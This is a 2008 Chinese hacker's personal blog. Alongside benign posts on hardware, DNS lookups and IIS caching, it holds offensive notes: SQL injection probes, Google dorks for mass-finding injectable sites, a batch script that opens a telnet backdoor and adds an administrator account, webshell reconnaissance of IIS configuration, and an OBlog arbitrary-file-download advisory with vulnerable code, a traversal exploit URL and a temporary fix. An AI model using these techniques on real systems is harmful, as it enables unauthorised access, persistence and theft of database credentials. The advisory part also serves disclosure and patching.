臭虫BLOG 臭虫博客

今天见了个很牛的板子（华硕Striker II Extreme）

臭虫 — 2008-9-4 9:31:57

这个板子很牛X，但是价格太高了，4200大元啊~等吧，啥时候价格下来偶就买回去挂到墙上看！

学习积累SQL注入

臭虫 — 2008-8-27 11:32:35

and 1=1 和 and 1=2   返回结果不一样说明又注入点
and user>0   判断数据库类如返回带有SQL Server类型的关键字代表是MSSQL数据库
and exists (select * from 表名)  判断使用的说明表名
and exists (select 列名 from 表名) 这样可以判断列名是什么，常见的又name .user.username.admin.adminname

google hack

臭虫 — 2008-8-27 9:29:40

inurl:asp?id= (这样子啊GOOGLE里搜索出来带有asp?id=的站点，适用于大量搜索注入点)
site: 网址 inurl:asp?id= (搜索详细的网站带有asp?id=参数的页面)

3389超出最大连接数

臭虫 — 2008-7-31 8:42:05

服务器为win2003的系统，在本地运行：mstsc /console，然后登陆连接

查看MX记录是否生效

臭虫 — 2008-7-17 8:28:19

运行->CMD.exe
nslookup 回车；
set ty=mx 回车；
输入你要查询的域名回车

心情很糟~所以无标题~~~

臭虫 — 2008-7-15 9:23:28

打开了久违的BLOG，却不知道从何下手，想写点什么可是脑袋里一片空白不知道这么写开始。脑袋里只有烦，说不上来的烦~早上起来到公司面部就一直一个表情。可能和天气有关吧只要到下雨天就属于少言寡语,到公司打开电脑却不知道做些什么？想让自己忙碌取来却发现无从下手只有看着显示器发呆脑袋一片空白的发呆~突然有个想法想好好的休息几天！想一个人去爬山又想会到老家陪着自己的父母呆几天可能会好一点吧！哎~~~~走一步说一步吧前面的路依然未知但是还要走下去~

telnet 后门

臭虫 — 2008-7-3 7:56:34

@echo off
net start telnet
tlntadmn config port=自己设置端口
net user 帐号密码 /add
net localgroup administrators 帐号 /add

webshell下查找所有IIS站点配置

臭虫 — 2008-6-30 11:55:19

默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,
路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)
MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。
几个主要的配置有:
ServerComment:我的网站 //站点的名称
ServerBindings:80 //站点的端口
Path="D:\wwwroot" //这里是站点的路径
DefaultDoc="index.asp,index.php,index.htm,Default.htm,Default.asp,Default.aspx" //默认文档头,就是主页显示文件名
ScriptMaps==".asa,C:\WINDOWS\syst..........." //站点支持的哪些脚本.

还有就是看C:\WINDOWS\system32\inetsrv\History这个目录,这个目录里是对每次站点的IIS设置进行的备份.
但这些都涉及到权限问题，如果权限默认设置严格就访问不了了。

IIS缓存

臭虫 — 2008-6-23 10:25:38

如果是要去除某个虚拟目录的缓存，那么可以直接编辑元数据库：
控制静态缓存的属性是MD_VR_NO_CACHE，0为启用，1为禁用。把他设置为1即可。
比如：

LM/W3SVC/n/ROOT/vdir MD_VR_NO_CACHE=1

如果要禁用IIS所有站点静态页面缓存，那么可以：
编辑注册表中的 DisableStaticFileCache值，0为启用，1为禁用，该键值的位置位于：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InetInfo\Parameters key

OBLOG漏洞。（任意文件下载漏洞）

臭虫 — 2008-5-2 13:54:27

########################################################################
程序下载：http://down.oblog.cn/oblog4/oblog46_Final_20080403.rar
########################################################################
描述：

愚人节那天雕牌在blog上公布了一个Oblog任意文件下载漏洞。文章见http://www.tr4c3.com/post/302.html <0day>愚人节的礼物 oblog文件下载漏洞。
随后官方发布的Oblog版本里对代码做了些许改动，并发布了相关补丁。详见：http://bbs.oblog.cn/dispbbs.asp?boardid=119&Id=132375 [oblog46体验版_patch_20080403补丁]
http://www.target.com/attachment.asp?path=./conn.asp这样已经无法下载文件，我从官方下载了最新版本4.60 Final Build080403 Access(集成了attachment.asp补丁)，发现修改后的代码并不能解决问题,OBlog任意文件下载漏洞依然存在。具体看attachment.asp代码。
########################################################################
关键部分：

Path = Trim(Request("path")) '获取用户提交的路径
FileID = Trim(Request("FileID"))
If FileID ="" And Path = "" Then
        Response.Write "参数不足"
        Response.End
End If
...
If CheckDownLoad  Or 1= 1Then
        If Path = "" Then
                set rs = Server.CreateObject("ADODB.RecordSet")
                link_database
                SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "&CLng(FileID))
                rs.open sql,conn,1,3
                If Not rs.Eof Then
                        uid = rs(1)
                        file_ext = rs(2)
                        rs("ViewNum") = rs("ViewNum") + 1
                        rs.Update
                        downloadFile Server.MapPath(rs(0)),0
                Else
                        Response.Status=404
                        Response.Write "该附件不存在!"
                End If
                rs.Close
                Set rs = Nothing
        Else
                If InStr(path,Oblog.CacheConfig(56)) > 0 Then 'Tr4c3标注：注意这里，仅仅判断用户提交的路径是否包含UploadFiles，为真则调用downloadfile函数下载文件
                        downloadFile Server.MapPath(Path),1
                End if
        End If
Else
        '如果附件为图片的话，当权限检验无法通过则调用一默认图片，防止标记无法调用，影响显示效果
        If Path = "" Then
                Response.Status=403
                Response.Write ShowDownErr
                Response.End
        Else
                downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
        End if
End if

Set oblog = Nothing

Sub downloadFile(strFile,stype)
        On Error Resume Next
        Server.ScriptTimeOut=9999999
        Dim S,fso,f,intFilelength,strFilename
        strFilename = strFile
        Response.Clear
        Set s = Server.CreateObject(oblog.CacheCompont(2))
        s.Open
        s.Type = 1
        Set fso = Server.CreateObject(oblog.CacheCompont(1))
        If Not fso.FileExists(strFilename) Then
                If stype = 0 Then
                        Response.Status=404
                        Response.Write "该附件已经被删除!"
                        Exit Sub
                Else
                        strFilename = Server.MapPath(blogdir&"images/nopic.gif")
                End if
        End If
        Set f = fso.GetFile(strFilename)
        intFilelength = f.size
        s.LoadFromFile(strFilename)
        If Err Then
                 Response.Write("

错误:

" & Err.Description & "

")
                Response.End
        End If
        Set fso=Nothing
        Dim Data
        Data=s.Read
        s.Close
        Set s=Nothing
        Dim ContentType
        select Case LCase(Right(strFile, 4))
        Case ".asp",".mdb",".config",".js" 'Tr4c3标注：再看这里，想起来什么来了？对了，前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com/post/306.html]，利用方法也相似，神奇的"."又派上用场了。
                Exit Sub
        Case ".asf"
                ContentType = "video/x-ms-asf"
        Case ".avi"
                ContentType = "video/avi"
        Case ".doc"
                ContentType = "application/msword"
        Case ".zip"
                ContentType = "application/zip"
        Case ".xls"
                ContentType = "application/vnd.ms-excel"
        Case ".gif"
                ContentType = "image/gif"
        Case ".jpg", "jpeg"
                ContentType = "image/jpeg"
        Case ".wav"
                ContentType = "audio/wav"
        Case ".mp3"
                ContentType = "audio/mpeg3"
        Case ".mpg", "mpeg"
                ContentType = "video/mpeg"
        Case ".rtf"
                ContentType = "application/rtf"
        Case ".htm", "html"
                ContentType = "text/html"
        Case ".txt"
                ContentType = "text/plain"
        Case Else
                ContentType = "application/octet-stream"
        End select
        If Response.IsClientConnected Then
                If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0 )Then
                        Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
                End If
                Response.AddHeader "Content-Length", intFilelength
                Response.CharSet = "UTF-8"
                Response.ContentType = ContentType
                Response.BinaryWrite Data
                Response.Flush
                Response.Clear()
        End If
End Sub

########################################################################
利用方法：
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
修补建议：
等待官方发布新的补丁程序。
########################################################################
临时解决办法：
将attachment.asp第5行 Path = Trim(Request("path")) 改成 Path = Replace(Trim(Request("path")),"..","")
########################################################################